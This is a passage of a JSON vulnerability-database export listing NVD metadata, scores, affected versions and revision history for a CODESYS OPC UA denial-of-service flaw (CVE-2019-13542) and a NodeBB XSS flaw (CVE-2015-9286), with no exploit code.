"cpeConfiguration"}, {"hash": "72939b299baa631da682814c53249d49", "key": "title"}, {"hash": "23cf199738e1a8bfeb155dee12c3b681", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9118f7637f69cf6d5c50675abb7a2f89", "key": "cvelist"}, {"hash": "60856010ab022ddc5eb989281784c6c1", "key": "affectedSoftware"}, {"hash": "2ce83d7ed60b8fab569a92adb1479441", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97648f682d0b3cc49c9db51b91556bde", "key": "cvss2"}, {"hash": "b70edea30079f317c31f12f39bb7a203", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "id": "CVE-2019-13542", "lastseen": "2020-09-21T14:54:49", "modified": "2019-10-09T23:46:00", "objectVersion": "1.3", "published": "2019-09-17T19:15:00", "references": ["https://www.us-cert.gov/ics/advisories/icsa-19-255-04"], "reporter": "cve@mitre.org", "title": "CVE-2019-13542", "type": "cve", "viewCount": 39}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:54:49"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-13542"], "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-476"], "description": "3S-Smart Software Solutions GmbH CODESYS V3 OPC UA Server, all versions 3.5.11.0 to 3.5.15.0, allows an attacker to send crafted requests from a trusted OPC UA client that cause a NULL pointer dereference, which may trigger a denial-of-service condition.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-10-10T12:16:13", "references": [{"idList": ["ICSA-19-255-04"], "type": "ics"}], "rev": 2}, "score": {"modified": "2019-10-10T12:16:13", "rev": 2, "value": 5.4, "vector": "NONE"}}, "hash": "3d1bfae8b00bafdb6a7ceb3f4762cd93d01c38597842675d1972a148b63c890f", "hashmap": [{"hash": "33ed16df6c59769dd4ad7c0a6c5063d0", "key": "description"}, {"hash": "f10299951f918c711504010cb77b610e", "key": "cwe"}, {"hash": "24f0ec5bc9e1f2aa209e1d4d29528d44", "key": "references"}, {"hash": "f69b9fcef9ab6a45e2cc456c2c83e88e", "key": "modified"}, {"hash": "3a24dfd360218a9ca36afb3843751b95", "key": "cvss"}, {"hash": "72939b299baa631da682814c53249d49", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "9118f7637f69cf6d5c50675abb7a2f89", "key": "cvelist"}, {"hash": "2ce83d7ed60b8fab569a92adb1479441", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97648f682d0b3cc49c9db51b91556bde", "key": "cvss2"}, {"hash": "b70edea30079f317c31f12f39bb7a203", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "id": "CVE-2019-13542", "lastseen": "2019-10-10T12:16:13", "modified": "2019-10-09T23:46:00", "objectVersion": "1.3", "published": "2019-09-17T19:15:00", "references": ["https://www.us-cert.gov/ics/advisories/icsa-19-255-04"], "reporter": "cve@mitre.org", "title": "CVE-2019-13542", "type": "cve", "viewCount": 39}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 3, "lastseen": "2019-10-10T12:16:13"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "60856010ab022ddc5eb989281784c6c1"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "ab8a77db2166bc129d0642f6c0054070"}, {"key": "cvelist", "hash": "9118f7637f69cf6d5c50675abb7a2f89"}, {"key": "cvss", "hash": "3a24dfd360218a9ca36afb3843751b95"}, {"key": "cvss2", "hash": "97648f682d0b3cc49c9db51b91556bde"}, {"key": "cvss3", "hash": "23cf199738e1a8bfeb155dee12c3b681"}, {"key": "cwe", "hash": "f10299951f918c711504010cb77b610e"}, {"key": "description", "hash": "33ed16df6c59769dd4ad7c0a6c5063d0"}, {"key": "extraReferences", "hash": "fca7a4b9b23a8d0591b73bd319a9d0f1"}, {"key": "href", "hash": "b70edea30079f317c31f12f39bb7a203"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "f69b9fcef9ab6a45e2cc456c2c83e88e"}, {"key": "published", "hash": "2ce83d7ed60b8fab569a92adb1479441"}, {"key": "references", "hash": "24f0ec5bc9e1f2aa209e1d4d29528d44"}, {"key": "reporter", "hash": "345c97c4bc16e15b8caea3259064e12a"}, {"key": "title", "hash": "72939b299baa631da682814c53249d49"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "3a0d0564e62fa722cf56ed9b3535f77675a8379f41da7093905a67733897d32f", "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "ics", "idList": ["ICSA-19-255-04"]}], "modified": "2021-04-23T00:45:10", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-04-23T00:45:10", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "codesys:linux", "name": "codesys linux", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_pfc100", "name": "codesys control for pfc100", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_beaglebone", "name": "codesys control for beaglebone", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_win", "name": "codesys control win", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:runtime_system_toolkit", "name": "codesys runtime system toolkit", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_raspberry_pi", "name": "codesys control for raspberry pi", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_pfc200", "name": "codesys control for pfc200", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_empc-a\\/imx6", "name": "codesys control for empc-a\\/imx6", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_for_iot2000", "name": "codesys control for iot2000", "operator": "lt", "version": "3.5.15.0"}, {"cpeName": "codesys:control_rte", "name": "codesys control rte", "operator": "lt", "version": "3.5.15.0"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-476"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:codesys:control_for_raspberry_pi:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_iot2000:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_beaglebone:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_pfc100:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:runtime_system_toolkit:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:linux:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_pfc200:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_win:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_rte:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:codesys:control_for_empc-a\\/imx6:3.5.15.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.5.15.0", "versionStartIncluding": "3.5.11.0", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.us-cert.gov/ics/advisories/icsa-19-255-04", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-255-04"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", 